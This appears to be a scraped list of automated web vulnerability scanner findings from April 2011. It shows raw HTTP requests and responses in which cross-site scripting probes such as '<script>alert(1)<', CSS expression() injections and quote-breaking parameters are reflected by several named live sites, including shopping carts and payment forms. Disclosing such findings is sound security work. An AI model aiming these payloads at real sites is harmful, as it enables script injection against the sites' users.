Host: | http://mbox5.offermatica |
Path: | /m2/netsuite/mbox |
GET /m2/netsuite/mbox Host: mbox5.offermatica.com Proxy-Connection: keep-alive Referer: http://www.netsuite.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/javascript Content-Length: 146 Date: Mon, 25 Apr 2011 15:18:18 GMT Server: Test & Target mboxFactoryDefault.get( |
Severity: | High |
Confidence: | Certain |
Host: | http://mbox9e.offermatica |
Path: | /m2/eset/mbox/standard |
GET /m2/eset/mbox/standard Host: mbox9e.offermatica.com Proxy-Connection: keep-alive Referer: http://www.eset.com/us User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/javascript Content-Length: 209 Date: Mon, 25 Apr 2011 13:00:35 GMT Server: Test & Target mboxFactories.get( |
Severity: | High |
Confidence: | Certain |
Host: | http://ok.mail.ru |
Path: | /cookie-token.do |
GET /cookie-token.do?client Host: ok.mail.ru Proxy-Connection: keep-alive Referer: http://odnoklassniki.ru/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: FTID=2jmTRp3gv_ms |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat Set-Cookie: JSESSIONID=CBEE3BB85 Content-Type: text/html;charset=utf-8 Content-Language: en-US Content-Length: 243 Date: Mon, 25 Apr 2011 14:35:03 GMT Connection: close <html> <head> </head> <body> Failed to convert value of type [java.lang.String] to required type [long]; nested exception is java.lang.NumberForm </body> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ok.mail.ru |
Path: | /cookie-token.do |
GET /cookie-token.do?client Host: ok.mail.ru Proxy-Connection: keep-alive Referer: http://odnoklassniki.ru/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: FTID=2jmTRp3gv_ms |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat Set-Cookie: JSESSIONID=A90368686 Content-Type: text/html;charset=utf-8 Content-Language: en-US Content-Length: 251 Date: Mon, 25 Apr 2011 14:35:13 GMT Connection: close <html> <head> </head> <body> Failed to convert value of type [java.lang.String] to required type [boolean]; nested exception is java.lang.IllegalArg </body> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://pixel.fetchback |
Path: | /serve/fb/pdc |
GET /serve/fb/pdc?cat=&name Host: pixel.fetchback.com Proxy-Connection: keep-alive Referer: http://www.netsuite.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cmp=1_1303696672_1660 |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 15:14:10 GMT Server: Apache/2.2.3 (Red Hat) Set-Cookie: cmp=1_1303744450_1660 Set-Cookie: uid=1_1303744450 Set-Cookie: kwd=1_1303744450; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:10 GMT; Path=/ Set-Cookie: sit=1_1303744450_2451 Set-Cookie: cre=1_1303744450; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:10 GMT; Path=/ Set-Cookie: bpd=1_1303744450; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:10 GMT; Path=/ Set-Cookie: apd=1_1303744450; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:10 GMT; Path=/ Set-Cookie: scg=1_1303744450; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:10 GMT; Path=/ Set-Cookie: ppd=1_1303744450; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:10 GMT; Path=/ Set-Cookie: afl=1_1303744450; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:10 GMT; Path=/ Cache-Control: max-age=0, no-store, must-revalidate, no-cache Expires: Mon, 25 Apr 2011 15:14:10 GMT Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 91 <!-- campaign : 'landingd41e8<x style=x:expression(alert |
Severity: | High |
Confidence: | Certain |
Host: | http://pl.yumenetworks |
Path: | /dynamic_preroll_playlist |
GET /dynamic_preroll_playlist Host: pl.yumenetworks.com Proxy-Connection: keep-alive Referer: http://games.mochiads.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: yumerm=0rO0ABXcMAAAA |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 14:54:19 GMT Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: no-cache Set-Cookie: yumerm=0rO0ABXcMAAAA YmRmHdr: @RM153_1_232 Set-Cookie: ymdt=0rO0ABXcSAAAEug YmDtHdr: @DT_GU Ypp: @YP_1_1;46718_21626 Set-Cookie: ymf=null; Domain=.yumenetworks.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: ymvw=173_193_214_243 Content-Type: application/smil Content-Length: 3140 P3P: policyref="http://ads Connection: close <smil xmlns:yume="http://www <head> <layout> <root-layout id="main" width="480" height="360ac54b<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://pl.yumenetworks |
Path: | /dynamic_preroll_playlist |
GET /dynamic_preroll_playlist Host: pl.yumenetworks.com Proxy-Connection: keep-alive Referer: http://games.mochiads.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: yumerm=0rO0ABXcMAAAA |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 14:54:09 GMT Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: no-cache Set-Cookie: yumerm=0rO0ABXcMAAAA YmRmHdr: @RM153_1_232 Set-Cookie: ymdt=0rO0ABXcSAAAEug YmDtHdr: @DT_GU Ypp: @YP_1_1;46718_21628 Set-Cookie: ymf=null; Domain=.yumenetworks.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: ymvw=173_193_214_243 Content-Type: application/smil Content-Length: 3140 P3P: policyref="http://ads Connection: close <smil xmlns:yume="http://www <head> <layout> <root-layout id="main" width="4808df88<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://playaudiomessage |
Path: | /play.asp |
GET /play.asp?m=535240&f Host: playaudiomessage.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Mon, 25 Apr 2011 19:54:35 GMT ServerID: 52 P3P: "CP=\"IDC CSP DOR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT\"" Content-Length: 1121 Content-Type: text/html Set-Cookie: ASPSESSIONIDASCRBCAQ Cache-control: private <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html><head><meta name=vs_targetSchema content="http://schemas <title>InstantAudioPlayer ...[SNIP]... <PARAM name="movie" value="http://click-here ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://secure.trust |
Path: | /ResetPassword.php |
POST /ResetPassword.php HTTP/1.1 Host: secure.trust-guard.com Connection: keep-alive Referer: https://secure.trust Cache-Control: max-age=0 Origin: https://secure.trust User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=147269874 Content-Length: 112 txtEmail=%27%22--%3E%3C |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 16:42:19 GMT Server: Apache/2.2.3 (CentOS) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 3991 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... </script>b5145<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://shopping.netsuite |
Path: | /s.nl |
GET /s.nl?alias=44891'style%3d'x Host: shopping.netsuite.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: NLVisitorId=rcHW8415 |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 15:15:54 GMT Server: Apache Cache-Control: No-Cache,no-store Pragma: No-Cache Expires: 0 NS_RTIMER_COMPOSITE: 233571352:73686F702D X-Powered-By: Servlet/2.5 JSP/2.1 P3P: CP="CAO PSAa OUR BUS PUR" Vary: User-Agent Content-Type: text/html; charset=utf-8 Content-Length: 55003 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>ESET Shopping Cart - ESET North America</title> <script type="text/javascript"> var gaJsHost = (("https:" = ...[SNIP]... <input type='hidden' name='referer' value='http://shopping ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://shopping.netsuite |
Path: | /s.nl |
GET /s.nl?alias=&c=438708&n=1 Host: shopping.netsuite.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: NLVisitorId=rcHW8415 |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 15:36:23 GMT Server: Apache Cache-Control: No-Cache,no-store Pragma: No-Cache Expires: 0 NS_RTIMER_COMPOSITE: 2009315293:73686F702 X-Powered-By: Servlet/2.5 JSP/2.1 P3P: CP="CAO PSAa OUR BUS PUR" Vary: User-Agent Content-Type: text/html; charset=utf-8 Content-Length: 54826 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>ESET Shopping Cart - ESET North America</title> <script type="text/javascript"> var gaJsHost = (("https:" = ...[SNIP]... <input type='hidden' name='referer' value='http://shopping ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://shopping.netsuite |
Path: | /s.nl |
GET /s.nl?c=438708&n=1&sc=3 Host: shopping.netsuite.com Proxy-Connection: keep-alive Referer: http://www.eset.com/us Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JSESSIONID=dYyfN1wHZ |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 13:20:44 GMT Server: Apache Cache-Control: No-Cache,no-store Pragma: No-Cache Expires: 0 NS_RTIMER_COMPOSITE: 1564875036:73686F702 X-Powered-By: Servlet/2.5 JSP/2.1 P3P: CP="CAO PSAa OUR BUS PUR" Vary: User-Agent Content-Type: text/html; charset=utf-8 Content-Length: 54762 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>ESET Shopping Cart - ESET North America</title> <script type="text/javascript"> var gaJsHost = (("https:" = ...[SNIP]... <input type='hidden' name='referer' value='http://shopping ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://shopping.netsuite |
Path: | /s.nl/c.438708/n.1/sc.3/ |
GET /s.nl/c.4387087c1c0'style%3d'x Host: shopping.netsuite.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: NLVisitorId=rcHW8415 |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 15:52:11 GMT Server: Apache Cache-Control: No-Cache,no-store Pragma: No-Cache Expires: 0 NS_RTIMER_COMPOSITE: -1139567357:73686F70 X-Powered-By: Servlet/2.5 JSP/2.1 P3P: CP="CAO PSAa OUR BUS PUR" Vary: User-Agent Content-Type: text/html; charset=utf-8 Content-Length: 54807 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>ESET Shopping Cart - ESET North America</title> <script type="text/javascript"> var gaJsHost = (("https:" = ...[SNIP]... <input type='hidden' name='referer' value='http://shopping ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://shopping.netsuite |
Path: | /s.nl/c.438708/n.1/sc.3/ |
GET /s.nl/c.438708/n.1/sc.3/ Host: shopping.netsuite.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: NLVisitorId=rcHW8415 |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 15:45:46 GMT Server: Apache Cache-Control: No-Cache,no-store Pragma: No-Cache Expires: 0 NS_RTIMER_COMPOSITE: 1121575945:73686F702 X-Powered-By: Servlet/2.5 JSP/2.1 P3P: CP="CAO PSAa OUR BUS PUR" Vary: User-Agent Content-Type: text/html; charset=utf-8 Content-Length: 49710 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>ESET Shopping Cart - ESET North America</title> <script type="text/javascript"> var gaJsHost = (("https:" = ...[SNIP]... rt%25281%2529%2529 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://tools.manageengine |
Path: | /forums/security-manager |
GET /forums/security-manager Host: tools.manageengine.com Proxy-Connection: keep-alive Referer: http://www.manageengine User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=208542606 |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 12:12:09 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 64452 <html xmlns="http://www.w3.org <head> <style> body { } .forumTitle{float:left; margin-top:-12px; padding-left:10px; font:11px Verdana, Arial, Helvetica, sans-serif;color:#000 ...[SNIP]... <a class=\"forumTitle\" target=\"_blank\" href='http://forums ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://widgets.digg.com |
Path: | /buttons/count |
GET /buttons/count?url=file Host: widgets.digg.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Age: 0 Date: Mon, 25 Apr 2011 12:10:55 GMT Via: NS-CACHE: 100 Etag: "3112ca90777458234aa Content-Length: 191 Server: TornadoServer/0.1 Content-Type: application/json Accept-Ranges: bytes Cache-Control: private, max-age=599 Expires: Mon, 25 Apr 2011 12:20:54 GMT X-CDN: Cotendo Connection: Keep-Alive __DBW.collectDiggs({"url" |
Severity: | High |
Confidence: | Certain |
Host: | https://www.controlscan |
Path: | /save_order.php |
POST /save_order.php HTTP/1.1 Host: www.controlscan.com Connection: keep-alive Referer: https://www.controlscan Cache-Control: max-age=0 Origin: https://www.controlscan User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=00f4el4lcu Content-Length: 348 total=747.00&firstname= ...[SNIP]... |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 12:57:47 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: CP="PHY DEM ONL STA PUR NAV COM OUR DELo CUR ADM DEV IDC COR BUS DSP" Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 26903 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Conten ...[SNIP]... <script type="text/javascript"> /*globals YWA*/ var YWATracker = YWA.getTracker( YWATracker.setMemberId('' YWATracker.setDocume YWATracker.setDocume */ YWATracker.submit(); </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://www.fusionvm.com |
Path: | /FusionVM/DesktopDefault |
POST /FusionVM/DesktopDefault Host: www.fusionvm.com Connection: keep-alive Referer: https://www.fusionvm.com Origin: https://www.fusionvm.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Content-Type: application/x-www-form Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASPSESSIONIDQQQASDQQ Content-Length: 5126 _IG_CSS_LINKS_= ...[SNIP]... 0alhcvIV7k7bu3g37Ajm |
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 X-Powered-By: ASP.NET X-AspNet-Version: 4.0.30319 Date: Mon, 25 Apr 2011 12:57:37 GMT Content-Length: 5375 /FusionVM/Images ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://www.fusionvm.com |
Path: | /FusionVM/DesktopDefault |
POST /FusionVM/DesktopDefault Host: www.fusionvm.com Connection: keep-alive Referer: https://www.fusionvm.com Origin: https://www.fusionvm.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Content-Type: application/x-www-form Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASPSESSIONIDQQQASDQQ Content-Length: 5126 _IG_CSS_LINKS_= ...[SNIP]... |
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 X-Powered-By: ASP.NET X-AspNet-Version: 4.0.30319 Date: Mon, 25 Apr 2011 12:56:31 GMT Content-Length: 1716 <&>0ctl01$Banner ...[SNIP]... ows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 ViewState: /wEWBgKu2sn5AwLrz4T3 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://www.fusionvm.com |
Path: | /FusionVM/DesktopDefault |
GET /FusionVM/DesktopDefault Host: www.fusionvm.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASPSESSIONIDQQQASDQQ |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Expires: Mon, 25 Apr 2011 12:56:49 GMT X-Powered-By: ASP.NET X-AspNet-Version: 4.0.30319 Date: Mon, 25 Apr 2011 12:56:48 GMT Content-Length: 33904 <html> <head id="htmlHead"> </head> <body onload="sClock();"> <form method="post" action="DesktopDefault <div class="aspNetHidden"> <input ...[SNIP]... <script language="javascript" ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.google.com |
Path: | /search |
GET /search?sclient=psy&hl=en Host: www.google.com Proxy-Connection: keep-alive Referer: http://www.google.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Avail-Dictionary: rU20-FBA Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PREF=ID=0772c9d5ef13aaaf |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 12:47:44 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Server: gws X-XSS-Protection: 1; mode=block Content-Length: 25014 f94-wCe9....S....o....Q.. ...[SNIP]... index.cfm%3Fm%3D1112%26pg ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.instantengage |
Path: | /open_chat.php |
GET /open_chat.php?Account_ID Host: www.instantengage.com Proxy-Connection: keep-alive Referer: http://www.integrity User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 15:47:14 GMT Server: Apache/2.0.50 (Fedora) X-Powered-By: PHP/4.3.8 P3P: CP="OTI DSP COR PSAa OUR IND COM NAV STA" Content-Length: 5284 Connection: close Content-Type: text/html; charset=UTF-8 <html> <head> <script language="javascript"> <!-- //InstantEngage Script Template// //Page Variables - System Generated var gURL_Server = "www.instantengage.com"; var gSSL_Port = 443; va ...[SNIP]... ww.instantengage.com var OperatorOfflineImageSrc = "http://www.instantengage var OperatorOfflineEmail var VisitorDefaultName = ""; // The server can actually place the actual Name here var VisitorDefaultEmail = ""; // The server can a ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.instantengage |
Path: | /open_chat.php |
GET /open_chat.php?Account_ID Host: www.instantengage.com Proxy-Connection: keep-alive Referer: http://www.integrity User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 15:47:11 GMT Server: Apache/2.0.50 (Fedora) X-Powered-By: PHP/4.3.8 P3P: CP="OTI DSP COR PSAa OUR IND COM NAV STA" Content-Length: 5283 Connection: close Content-Type: text/html; charset=UTF-8 <html> <head> <script language="javascript"> <!-- //InstantEngage Script Template// //Page Variables - System Generated var gURL_Server = "www.instantengage.com"; var gSSL_Port = 443; var gAccount_ID = 1756;var gPage_ID = 2293e1979;alert(1)/ var gStatus = 1; // 1 - Browsing function onVisitor ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.integrity |
Path: | /buyerDetails.php |
POST /buyerDetails.php HTTP/1.1 Host: www.integritydefender.com Proxy-Connection: keep-alive Referer: http://www.integrity Cache-Control: max-age=0 Origin: http://www.integrity User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=da4c413fd2 Content-Length: 62 amount=489c8b31<script>alert(1)< |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 15:46:54 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.16 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 14324 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content- ...[SNIP]... <strong class="blacktitle">Basic Personal Services - $489c8b31<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.integrity |
Path: | /buyerDetails.php |
POST /buyerDetails.php HTTP/1.1 Host: www.integritydefender.com Proxy-Connection: keep-alive Referer: http://www.integrity Cache-Control: max-age=0 Origin: http://www.integrity User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=da4c413fd2 Content-Length: 62 amount=489b24dc"><script>alert(1)< |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 15:46:53 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.16 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 14330 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content- ...[SNIP]... <input type="hidden" name="amount" value="489b24dc\"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.integrity |
Path: | /buyerDetails.php |
